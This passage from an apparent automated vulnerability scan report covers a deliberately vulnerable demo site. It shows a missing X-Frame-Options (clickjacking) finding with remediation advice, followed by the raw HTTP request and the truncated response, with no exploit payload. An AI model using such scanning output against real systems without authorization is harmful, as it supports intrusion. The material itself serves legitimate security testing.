          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc